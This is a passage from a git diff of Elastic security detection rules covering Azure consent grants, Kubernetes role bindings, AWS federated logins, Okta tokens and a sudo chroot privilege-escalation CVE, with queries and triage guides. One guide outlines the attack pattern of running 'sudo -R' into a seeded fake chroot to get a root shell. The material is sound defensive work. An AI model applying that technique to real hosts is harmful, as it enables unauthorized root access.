Unexpected locations or IP ranges may indicate adversary-controlled infrastructure.\n- Review `azure.auditlogs.properties.target_resources.display_name` to evaluate whether the application name is familiar, expected, or potentially spoofing a known service.\n- Review `azure.auditlogs.properties.target_resources.modified_properties.display_name` to inspect key indicators of elevated privilege or risk, including:\n - ConsentContext.IsAdminConsent to determine if the application was granted tenant-wide admin access.\n - ConsentContext.OnBehalfOfAll to identify whether the app was granted permissions on behalf of all users in the tenant.\n - ConsentAction.Permissions to evaluate the specific scopes and data access the application requested.\n - ConsentAction.Reason to understand if Microsoft flagged the activity or if any reason was recorded by the platform.\n - TargetId.ServicePrincipalNames to confirm the service principal associated with the granted permissions.\n- Review `azure.tenant_id` to confirm the activity originated from your tenant and is not related to a cross-tenant application.\n- Review `@timestamp` and `azure.auditlogs.properties.correlation_id` to pivot into related sign-in, token usage, or application activity for further context.\n\n### False positive analysis\n\n- Some applications may request high-privilege scopes for legitimate purposes. Validate whether the application is verified, developed by Microsoft, or approved internally by your organization.\n- Review publisher verification, app ownership, and scope alignment with the intended business use case.\n\n### Response and remediation\n\n- Revoke the application\u2019s OAuth grant using Graph API or PowerShell. Use the Remove-AzureADOAuth2PermissionGrant cmdlet.\n- Remove the associated service principal from Azure AD.\n- Reset credentials or revoke tokens for affected users.\n- Block the application via Conditional Access or Defender for Cloud Apps policies.\n- Enable the Admin Consent Workflow in Azure AD to prevent unsanctioned user approvals in the future.\n- Report any malicious applications to Microsoft to protect other tenants.\n", - "query": "event.dataset: \"azure.auditlogs\" and\n (\n azure.auditlogs.operation_name:\"Consent to application\"\n or event.action:\"Consent to application\"\n )\n and event.outcome: \"success\"\n and azure.auditlogs.properties.additional_details.key: \"AppId\"\n", - "references": [ - "https://www.wiz.io/blog/midnight-blizzard-microsoft-breach-analysis-and-best-practices", - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide", - "https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/", - "https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.22.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.additional_details.key", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - 
"Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access", - "Tactic: Credential Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/", - "subtechnique": [ - { - "id": "T1566.002", - "name": "Spearphishing Link", - "reference": "https://attack.mitre.org/techniques/T1566/002/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1528", - "name": "Steal Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1528/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 215 - }, - "id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_215", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_103.json b/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_103.json deleted file mode 100644 index 94ac548fbcc..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_103.json +++ /dev/null @@ -1,73 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies the creation of role binding or cluster role bindings. You can assign these roles to Kubernetes subjects (users, groups, or service accounts) with role bindings and cluster role bindings. An adversary who has permissions to create bindings and cluster-bindings in the cluster can create a binding to the cluster-admin ClusterRole or to other high privileges roles.", - "from": "now-20m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Kubernetes Rolebindings Created", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Kubernetes Rolebindings Created\nAzure Kubernetes role bindings are crucial for managing access control within Kubernetes clusters, allowing specific permissions to be assigned to users, groups, or service accounts. Adversaries with the ability to create these bindings can escalate privileges by assigning themselves or others high-level roles, such as cluster-admin. The detection rule monitors Azure activity logs for successful creation events of role or cluster role bindings, signaling potential unauthorized privilege escalation attempts.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the user or service account associated with the role binding creation event. 
Focus on the `event.dataset` and `azure.activitylogs.operation_name` fields to confirm the specific operation.\n- Check the `event.outcome` field to ensure the operation was successful and not a failed attempt, which might indicate a misconfiguration or testing.\n- Investigate the permissions and roles assigned to the identified user or service account to determine if they have legitimate reasons to create role bindings or cluster role bindings.\n- Examine the context of the role binding creation, such as the time of the event and any related activities, to identify any unusual patterns or correlations with other suspicious activities.\n- Verify if the role binding grants elevated privileges, such as cluster-admin, and assess the potential impact on the cluster's security posture.\n- Cross-reference the event with any recent changes in the cluster's configuration or access policies to understand if the role binding creation aligns with authorized administrative actions.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger alerts when legitimate users create role bindings for operational purposes. To manage this, identify and whitelist specific user accounts or service accounts that regularly perform these tasks.\n- Automated deployment tools or scripts that configure Kubernetes clusters might create role bindings as part of their normal operation. Exclude these tools by filtering out known service accounts or IP addresses associated with these automated processes.\n- Scheduled maintenance or updates to the Kubernetes environment can result in multiple role binding creation events. Establish a maintenance window and suppress alerts during this period to avoid unnecessary noise.\n- Development and testing environments often have frequent role binding changes. 
Consider creating separate monitoring rules with adjusted thresholds or risk scores for these environments to reduce false positives.\n- Collaboration with the DevOps team can help identify expected role binding changes, allowing for preemptive exclusion of these events from triggering alerts.\n\n### Response and remediation\n\n- Immediately revoke any newly created role bindings or cluster role bindings that are unauthorized or suspicious to prevent further privilege escalation.\n- Isolate the affected Kubernetes cluster from the network to prevent potential lateral movement or further exploitation by the adversary.\n- Conduct a thorough review of recent activity logs to identify any unauthorized access or changes made by the adversary, focusing on the time frame around the alert.\n- Reset credentials and access tokens for any compromised accounts or service accounts involved in the unauthorized role binding creation.\n- Escalate the incident to the security operations team for further investigation and to determine if additional clusters or resources are affected.\n- Implement additional monitoring and alerting for any future role binding or cluster role binding creation events to ensure rapid detection and response.\n- Review and tighten role-based access control (RBAC) policies to ensure that only necessary permissions are granted to users, groups, and service accounts, minimizing the risk of privilege escalation.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\n\t(\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE\" or\n\t \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE\") and\nevent.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "1c966416-60c1-436b-bfd0-e002fddbfd89", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "1c966416-60c1-436b-bfd0-e002fddbfd89_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1d485649-c486-4f1d-a99c-8d64795795ad_2.json b/packages/security_detection_engine/kibana/security_rule/1d485649-c486-4f1d-a99c-8d64795795ad_2.json new file mode 100644 index 00000000000..90d8e97606b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1d485649-c486-4f1d-a99c-8d64795795ad_2.json @@ 
-0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious use of sudo's --chroot / -R option consistent with attempts to exploit CVE-2025-32463 (the \"sudo chroot\" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*", + "logs-crowdstrike.fdr*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential CVE-2025-32463 Sudo Chroot Execution Attempt", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential CVE-2025-32463 Sudo Chroot Execution Attempt\n\nThis rule highlights sudo invoked with the chroot (-R/--chroot) option outside normal administration, a behavior tied to CVE-2025-32463 where attackers force sudo to load attacker-controlled NSS configs or libraries and escalate to root. An attacker pattern: running sudo -R /tmp/fakechroot /bin/sh after seeding that directory with malicious nsswitch.conf and libnss to obtain a root shell. Treat unexpected chrooted sudo on Linux hosts as high-risk privilege escalation activity.\n\n### Possible investigation steps\n\n- Extract the chroot target path from the event and enumerate its etc and lib directories for attacker-seeded NSS artifacts (nsswitch.conf, libnss_*, ld.so.preload) and fake passwd/group files, noting recent mtime, ownership, and world-writable files.\n- Pivot to file-creation and modification telemetry to identify processes and users that populated that path shortly before execution (e.g., curl, wget, tar, git, gcc), linking them to the invoking user to establish intent.\n- Review session and process details to see if a shell or interpreter was launched inside the chroot and whether an euid transition to 0 occurred, indicating a successful privilege escalation.\n- Confirm sudo's package version and build options and the user\u2019s sudoers policy (secure_path/env_* settings and any NOPASSWD allowances) to assess exploitability and whether chroot usage was authorized.\n- Collect and preserve the chroot directory contents and relevant audit/log artifacts, and scope by searching for similar chroot invocations or NSS file seeds across the host and fleet.\n\n### False positive analysis\n\n- A legitimate offline maintenance session where an administrator chroots into a mounted system under /mnt or /srv using sudo --chroot to run package or initramfs commands, which will trigger when the invoked program is not in the whitelist.\n- An image-building or OS bootstrap workflow that stages a root filesystem and uses sudo -R to execute a shell or build/configuration scripts inside the chroot, producing the same pattern from a known user or host context.\n\n### Response and remediation\n\n- Immediately isolate the affected host from the network, revoke the invoking user\u2019s sudo privileges, and terminate any chrooted shells or child processes spawned via \u201csudo -R /bin/sh\u201d or similar executions.\n- Preserve evidence and then remove attacker-seeded NSS and loader artifacts within the chroot path\u2014delete or 
replace nsswitch.conf, libnss_*.so, ld.so.preload, passwd, and group files, and clean up world-writable staging directories like /tmp/fakechroot.\n- Upgrade sudo to a fixed build that addresses CVE-2025-32463, and recover by restoring any modified system NSS and loader files from known-good backups while validating ownership, permissions, and hashes.\n- Escalate to full incident response if a root shell or process with euid 0 is observed, if /etc/ld.so.preload or /lib/libnss_*.so outside the chroot show unauthorized changes, or if similar \u201csudo -R\u201d executions appear across multiple hosts.\n- Harden by updating sudoers to remove NOPASSWD for chrooted commands, enforce Defaults env_reset and secure_path with noexec, disable \u201c--chroot\u201d usage for non-admin workflows, and monitor for creation of libnss_*.so or nsswitch.conf in non-standard directories.\n- Add platform controls by enabling SELinux/AppArmor policies on sudo and the dynamic loader, applying nodev,nosuid,noexec mounts to /tmp and build paths, and setting immutability (chattr +i) on /etc/nsswitch.conf where operationally feasible.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\", \"start\", \"executed\", \"process_started\", \"ProcessRollup2\") and\nprocess.name == \"sudo\" and process.args like (\"-R\", \"--chroot*\") and\n// To enforce the -R and --chroot arguments to be for sudo specifically, while wildcarding potential full sudo paths\nprocess.command_line like (\"*sudo -R*\", \"*sudo --chroot*\") \n", + "references": [ + "https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot", + "https://github.com/kh4sh3i/CVE-2025-32463" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "1d485649-c486-4f1d-a99c-8d64795795ad", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Use Case: Vulnerability", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "1d485649-c486-4f1d-a99c-8d64795795ad_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_103.json b/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_103.json deleted file mode 100644 index 8f3db824029..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_103.json +++ /dev/null @@ -1,81 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a rotation to storage account access keys in Azure. Regenerating access keys can affect any applications or Azure services that are dependent on the storage account key. 
Adversaries may regenerate a key as a means of acquiring credentials to access systems and resources.", - "false_positives": [ - "It's recommended that you rotate your access keys periodically to help keep your storage account secure. Normal key rotation can be exempted from the rule. An abnormal time frame and/or a key rotation from unfamiliar users, hosts, or locations should be investigated." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Storage Account Key Regenerated", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Storage Account Key Regenerated\n\nAzure Storage Account keys are critical credentials that grant access to storage resources. They are often used by applications and services to authenticate and interact with Azure Storage. Adversaries may regenerate these keys to gain unauthorized access, potentially disrupting services or exfiltrating data. The detection rule monitors for key regeneration events, flagging successful operations as potential indicators of credential misuse, thus enabling timely investigation and response.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the specific storage account associated with the key regeneration event by examining the operation_name field for \"MICROSOFT.STORAGE/STORAGEACCOUNTS/REGENERATEKEY/ACTION\".\n- Check the event.outcome field to confirm the success of the key regeneration and gather details about the user or service principal that initiated the action.\n- Investigate the user or service principal's recent activities in Azure to determine if there are any other suspicious actions or patterns that could indicate unauthorized access or misuse.\n- Assess the impact on applications and services that rely on the affected storage account key by identifying dependencies and checking for any service disruptions or anomalies.\n- Review access policies and permissions for the storage account to ensure they are appropriately configured and consider implementing additional security measures, such as Azure Key Vault, to manage and rotate keys securely.\n\n### False positive analysis\n\n- Routine key rotation by administrators or automated scripts can trigger alerts. To manage this, identify and document regular key rotation schedules and exclude these events from alerts.\n- Development and testing environments often regenerate keys frequently. Exclude these environments from alerts by filtering based on environment tags or resource names.\n- Third-party integrations or services that require periodic key regeneration might cause false positives. Work with service owners to understand these patterns and create exceptions for known, legitimate services.\n- Azure policies or compliance checks that enforce key rotation can also lead to false positives. Coordinate with compliance teams to align detection rules with policy schedules and exclude these events.\n- Ensure that any automated processes that regenerate keys are logged and documented. 
Use this documentation to create exceptions for these processes in the detection rule.\n\n### Response and remediation\n\n- Immediately revoke the regenerated storage account keys to prevent unauthorized access. This can be done through the Azure portal or using Azure CLI commands.\n- Identify and update all applications and services that rely on the compromised storage account keys with new, secure keys to restore functionality and prevent service disruption.\n- Conduct a thorough review of access logs and audit trails to identify any unauthorized access or data exfiltration attempts that may have occurred using the regenerated keys.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems or accounts have been compromised.\n- Implement conditional access policies and multi-factor authentication (MFA) for accessing Azure resources to enhance security and prevent similar incidents.\n- Review and update the storage account's access policies and permissions to ensure that only authorized users and applications have the necessary access.\n- Enhance monitoring and alerting mechanisms to detect future unauthorized key regeneration attempts promptly, ensuring timely response to potential threats.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.STORAGE/STORAGEACCOUNTS/REGENERATEKEY/ACTION\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "1e0b832e-957e-43ae-b319-db82d228c908", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1528", - "name": "Steal Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1528/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "1e0b832e-957e-43ae-b319-db82d228c908_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1f45720e-5ea8-11ef-90d2-f661ea17fbce_5.json b/packages/security_detection_engine/kibana/security_rule/1f45720e-5ea8-11ef-90d2-f661ea17fbce_5.json new file mode 100644 index 00000000000..de6399a8063 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1f45720e-5ea8-11ef-90d2-f661ea17fbce_5.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a federated user logs into the AWS Management Console. Federated users are typically given temporary credentials to access AWS services. 
If a federated user logs into the AWS Management Console without using MFA, it may indicate a security risk, as MFA adds an additional layer of security to the authentication process. However, CloudTrail does not record whether a Federated User utilized MFA as part of authentication \u2014 that MFA decision often occurs at a third-party IdP (e.g., Okta, Azure AD, Google). As a result, CloudTrail fields such as MFAUsed / mfaAuthenticated appear as \u201cNo/false\u201d for federated console logins even if IdP MFA was required. This alert should be correlated with IdP authentication logs to verify whether MFA was enforced for the session. Increase priority if you find a related \"GetSigninToken\" event whose source IP / ASN / geo or user-agent differs from the subsequent \"ConsoleLogin\" (possible token relay/abuse). Same-IP/UA pairs within a short window are more consistent with expected operator behavior and can be triaged with lower severity.", + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.session_context.session_issuer.arn", + "aws.cloudtrail.user_identity.session_context.session_issuer.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Sign-In Console Login with Federated User", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS Sign-In Console Login with Federated User\n\nFederated users in AWS are granted temporary credentials to access resources, often without the need for a permanent account. This setup is convenient but can be risky if not properly secured with multi-factor authentication (MFA). Adversaries might exploit this by using stolen or misconfigured credentials to gain unauthorized access. CloudTrail alone cannot reliably indicate MFA usage for federated logins. This rule surfaces potentially risky access for analyst review and IdP correlation.\n\n### Possible investigation steps\n\n- **Identify the principal involved**\n - `aws.cloudtrail.user_identity.arn` (federated session ARN)\n - `aws.cloudtrail.user_identity.session_context.session_issuer.*` (role ARN/name, account) of the identity that created the federated session.\n- **Investigate the source context**\n - examine `source.ip`, ASN, `geo` fields, and `user_agent.original`\n - Compare against normal IP ranges, known user-agents and expected locations for this identity\n#### Correlate to raise/lower priority\n- **Check IdP MFA:** Find the corresponding IdP login around the same time and verify MFA was required and passed.
If IdP shows **no MFA**, raise severity.\n- **Federation token pivot:** Look for a nearby `signin.amazonaws.com` `GetSigninToken` API call.\n - **More suspicious:** token creation and console login from different public IPs/ASNs/geo fields.\n - **Less suspicious:** same IP and expected user agents within ~10\u201315 minutes (typical operator behavior).\n- **Rareness/anomaly signals:** new/rare role or session issuer, rare source IP/ASN/geo, unusual time-of-day, multiple ConsoleLogin events from disparate networks in a short window.\n- Review recent activity associated with the federated user to identify any unusual or unauthorized actions that may have occurred following the login event.\n- Assess the configuration and policies of the Identity Provider (IdP) used for federated access to ensure MFA is enforced and properly configured for all users.\n\n### Related rules\n- AWS Sign-In Token Created - f754e348-f36f-4510-8087-d7f29874cc12\n\n### False positive analysis\n- Organizations using SSO for console access will routinely see federated `ConsoleLogin` where CloudTrail shows `MFAUsed: \"No\"` \u2014 this is expected due to IdP-side MFA.\n- Internal tools/automation that create federation links (`GetSigninToken`) for operators.\n- Maintain allow-lists for corp/VPN CIDRs, approved ASNs, and known automation user-agents.\n\n### Response and remediation\n- If IdP confirms MFA and the source context is expected: document and close.\n- If IdP shows no MFA or context is suspicious:\n - Notify the security team and relevant stakeholders about the potential security breach to ensure coordinated response efforts.\n - Disable/lock the IdP account pending review; invalidate IdP sessions if supported.\n - Temporarily restrict access (e.g., SCPs, session policies, IP-based conditions).\n - Conduct a thorough review of AWS CloudTrail logs to identify any suspicious activities or unauthorized access attempts associated with both the initiating user and the federated user account.\n - Hunt for a preceding `GetSigninToken` from a different IP/ASN/UA (possible token relay).\n - Ensure IdP policy enforces MFA for AWS app access; re-verify role trust and least-privilege policies.\n- Implement or enforce multi-factor authentication (MFA) for all federated user accounts to enhance security and prevent similar incidents in the future.\n- Review and update IAM policies and roles associated with federated users to ensure they follow the principle of least privilege.\n", + "query": "event.dataset: \"aws.cloudtrail\" and \n event.provider: \"signin.amazonaws.com\" and \n event.action : \"ConsoleLogin\" and \n aws.cloudtrail.user_identity.type: \"FederatedUser\" and\n event.outcome: \"success\"\n", + "references": [ + "https://hackingthe.cloud/aws/post_exploitation/create_a_console_session_from_iam_credentials/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1f45720e-5ea8-11ef-90d2-f661ea17fbce", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Amazon Web Services", + "Data Source: AWS", + "Data 
Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "1f45720e-5ea8-11ef-90d2-f661ea17fbce_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_204.json b/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_204.json deleted file mode 100644 index a4a54d7b830..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_204.json +++ /dev/null @@ -1,78 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when an Okta client address has a certain threshold of Okta user authentication events with multiple device token hashes generated for single user authentication. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts.", - "false_positives": [ - "Users may share an endpoint related to work or personal use in which separate Okta accounts are used.", - "Shared systems such as Kiosks and conference room computers may be used by multiple users." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "High Number of Okta Device Token Cookies Generated for Authentication", - "note": "## Triage and analysis\n\n### Investigating High Number of Okta Device Token Cookies Generated for Authentication\n\nThis rule detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. 
